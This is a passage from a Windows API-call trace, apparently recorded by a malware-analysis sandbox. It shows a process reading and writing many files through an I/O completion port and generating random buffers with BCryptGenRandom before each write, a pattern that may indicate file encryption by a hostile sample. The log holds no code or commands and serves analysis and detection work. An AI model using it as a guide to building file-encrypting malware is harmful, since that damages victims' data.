nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0103.357] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.360] CloseHandle (hObject=0x13c0) returned 1 [0103.365] free (_Block=0x1ff1e60) [0103.365] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.376] ReadFile (in: hFile=0xf00, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x1e7c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0103.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.495] WriteFile (in: hFile=0x710, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x10d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0103.495] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0103.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0103.513] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.514] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.514] free (_Block=0x77d800) [0103.514] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.514] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.514] free (_Block=0x2071818) [0103.514] free (_Block=0x2071928) [0103.514] free (_Block=0x77d908) [0103.514] WriteFile (in: hFile=0x2f8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0103.514] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.527] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.527] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.537] WriteFile (in: hFile=0x2f8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0103.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.549] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.549] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0103.549] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0103.550] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.550] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.550] free (_Block=0x77d800) [0103.550] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.550] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.550] free (_Block=0x2071818) [0103.550] free (_Block=0x2071928) [0103.550] free (_Block=0x77d908) [0103.550] WriteFile (in: hFile=0x304, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0103.551] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.555] CloseHandle (hObject=0x814) returned 1 [0103.560] free (_Block=0x3db00b8) [0103.560] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0103.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0103.570] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.570] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.570] free (_Block=0x77d800) [0103.570] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.570] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.570] free (_Block=0x2071818) [0103.570] free (_Block=0x2071928) [0103.570] free (_Block=0x77d908) [0103.570] WriteFile (in: hFile=0x2f8, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0103.571] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0103.580] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.580] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0103.580] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.580] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.580] free (_Block=0x77d800) [0103.580] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.580] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.581] free (_Block=0x2071818) [0103.581] free (_Block=0x2071928) [0103.581] free (_Block=0x77d908) [0103.581] WriteFile (in: hFile=0x814, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.589] WriteFile (in: hFile=0x2f8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0103.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0106.606] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2660, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.606] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0106.620] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x1ec0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0106.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0106.639] CloseHandle (hObject=0x3ac) returned 1 [0106.640] free (_Block=0x3ef0008) [0106.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0106.654] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0106.655] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0106.668] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0106.678] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.679] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0106.679] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.679] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0106.680] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.680] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.680] free (_Block=0x77d800) [0106.680] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.680] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.680] free (_Block=0x1fa4848) [0106.680] free (_Block=0x2071818) [0106.680] free (_Block=0x77d908) [0106.680] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0106.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0106.699] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0106.700] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0106.700] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.701] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.701] free (_Block=0x77d800) [0106.701] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.701] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.701] free (_Block=0x1fa4848) [0106.701] free (_Block=0x2071818) [0106.701] free (_Block=0x77d908) [0106.701] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0106.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0108.314] CloseHandle (hObject=0x3bc) returned 1 [0108.315] free (_Block=0x3ef0008) [0108.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0108.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0108.316] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0108.317] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.317] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.317] free (_Block=0x77d800) [0108.317] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.317] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.317] free (_Block=0x1fa4848) [0108.317] free (_Block=0x2071818) [0108.317] free (_Block=0x77d908) [0108.317] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0108.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.359] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.359] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0109.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0109.369] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.369] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.369] free (_Block=0x77d800) [0109.369] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.369] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.370] free (_Block=0x1fa4848) [0109.370] free (_Block=0x2071818) [0109.370] free (_Block=0x77d908) [0109.370] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0109.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.374] CloseHandle (hObject=0x81c) returned 1 [0109.376] free (_Block=0x3e70008) [0109.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0109.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0109.388] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.388] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.388] free (_Block=0x77d800) [0109.388] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.388] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.388] free (_Block=0x1fa4848) [0109.388] free (_Block=0x2071818) [0109.388] free (_Block=0x77d908) [0109.388] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0109.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0109.404] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.404] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.404] free (_Block=0x77d800) [0109.404] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.404] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.404] free (_Block=0x1fa4848) [0109.404] free (_Block=0x2071818) [0109.404] free (_Block=0x77d908) [0109.404] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0109.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.412] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.413] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0109.413] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0109.417] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.417] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.417] free (_Block=0x77d800) [0109.417] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.418] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.418] free (_Block=0x1fa4848) [0109.418] free (_Block=0x2071818) [0109.418] free (_Block=0x77d908) [0109.418] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0109.418] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.448] CloseHandle (hObject=0x81c) returned 1 [0109.450] free (_Block=0x3e70008) [0109.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.462] CloseHandle (hObject=0x3ac) returned 1 [0109.468] free (_Block=0x3d70048) [0109.468] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.474] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x3200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0109.475] GetQueuedCompletionStatus (in: 